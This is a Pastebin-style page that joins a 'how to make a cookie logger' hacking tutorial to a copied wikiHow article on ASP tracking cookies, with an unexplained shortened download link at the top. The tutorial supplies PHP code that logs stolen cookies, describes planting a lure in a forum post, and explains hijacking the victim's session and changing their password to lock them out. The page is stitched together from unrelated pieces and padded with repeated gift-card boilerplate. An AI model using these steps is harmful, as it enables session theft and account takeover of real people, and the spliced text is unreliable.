Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -
- Download Here --> https://tinyurl.com/muw2vxtn?id94565324 (Copy and Paste Link)
- How to make a cookie logger
- Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
- A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
- Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …
- Step 1: Save the notepad file from the link below and Rename it as Fun.gif:
- Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:
- $filename = “logfile.txt”;if (isset($_GET["cookie"]))if (!$handle = fopen($filename, ‘a’))echo “Temporary Server Error,Sorry for the inconvenience.”;exit;>elseif (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)echo “Temporary Server Error,Sorry for the inconvenience.”;exit;>>echo “Temporary Server Error,Sorry for the inconvenience.”;fclose($handle);exit;>echo “Temporary Server Error,Sorry for the inconvenience.”;exit;?>
- Step 3: Create a new Notepad File and Save it as logfile.txt
- Step 4: Upload this file to your server
- If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
- Step 5: Go to the victim forum and insert this code in the signature or a post :
- Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:
- Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
- Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.
- Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.
- Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only.
- How to Make a Tracking Cookie
- wikiHow is a “wiki,” similar to Wikipedia, which means that many of our articles are co-written by multiple authors. To create this article, 12 people, some anonymous, worked to edit and improve it over time.
- This article has been viewed 117,042 times.
- Tracking cookies enable the owner of a Web site to obtain information from visitors to his or her site. The Web site's owner can use the information to learn more about visitors and/or provide visitors with a more personalized and streamlined experience. For example, a cookie can store a Web site visitor's user name and password so the visitor does not have to populate this information every time he or she visits the Web site, saving the visitor time.
- Plan on what information you want your cookie to collect. Before you make a tracking cookie, you should determine what type of information you want to track from visitor's to your Web site. For instance, you may find it important to know the zip code of a person visiting your Web site if your Web site sells products that require shipping costs and certain sales taxes.
- Use the “Response” command to write a cookie on a visitor's computer. “Response.Cookies(“CookieName”)=value” is the most basic form of this code. The code: “Response.Cookies("VisitorName")=Request.Form("UserName")” would allow you to keep track of a visitor's user name.
- Use the “Request” command to retrieve the cookie. “Request.Cookies("CookieName")” would allow you to retrieve the information from the visitor's computer when the visitor returned to your Web site.
- Note however that standard HTML does not have commands. "Response" and "Request" are part of Microsoft's ASP (active server pages). See http://www.w3schools.com/asp/coll_cookies_response.asp If your web server does not support ASP, you'll have to investigate other methods of generating cookies, such as CGI scripts or PHP.
- Software will allow you to make certain kinds of cookies; sometimes a single type of software will only allow you to make a specific cookie. Some of this software is considered “freeware,” and thus won't cost you anything. Tracking cookie software can help with restricting how many times a visitor can download software from your Web site by remembering that the software was already downloaded.
- A domain property will restrict the cookie from being read by another Web site. A sample of the code for this is: Response.Cookies("CookieName").Domain = "www.mydomain.com"
- A path property restricts the cookie to being read by a specific path. A sample of the code for this is: Response.Cookies("CookieName").Path = "/maindir/subdir/path"
- Give your cookie an expiration. A cookie will expire once the Web browser the visitor uses to view your Web site is closed. An expiration date must be set if you want to store the cookie so that when the user comes back the information is saved. An example of this code is: Response.Cookies("CookieName").Expires=#January 01, 2010# (assuming a January 01, 2010 expiration date).
- Community Q&A
- The web-server can if it has implemented a method to do so, such as cookie tracking. It depends on the site.
- Thanks! We're glad this was helpful. Thank you for your feedback. As a small thank you, we’d like to offer you a $30 gift card (valid at GoNift.com). Use it to try out great new products and services nationwide without paying full price—wine, food delivery, clothing and more. Enjoy! Claim Your Gift If wikiHow has helped you, please consider a small contribution to support us in helping more readers like you. We’re committed to providing the world with free how-to resources, and even $1 helps us in our mission. Support wikiHow
- If you mean the advertising ID, then yes, your phone has one (although this is usually for apps). You can reset this in settings.
- Thanks! We're glad this was helpful. Thank you for your feedback. As a small thank you, we’d like to offer you a $30 gift card (valid at GoNift.com). Use it to try out great new products and services nationwide without paying full price—wine, food delivery, clothing and more. Enjoy! Claim Your Gift If wikiHow has helped you, please consider a small contribution to support us in helping more readers like you. We’re committed to providing the world with free how-to resources, and even $1 helps us in our mission. Support wikiHow
- A cookie is typically invisible to a user. You have to use special tools to view it. If you use something like Chrome Dev Tools or Firebug to view a cookie, you'll see that it is actually just a key-value pair.
- Thanks! We're glad this was helpful. Thank you for your feedback. As a small thank you, we’d like to offer you a $30 gift card (valid at GoNift.com). Use it to try out great new products and services nationwide without paying full price—wine, food delivery, clothing and more. Enjoy! Claim Your Gift If wikiHow has helped you, please consider a small contribution to support us in helping more readers like you. We’re committed to providing the world with free how-to resources, and even $1 helps us in our mission. Support wikiHow
Advertisement
Add Comment
Please, Sign In to add comment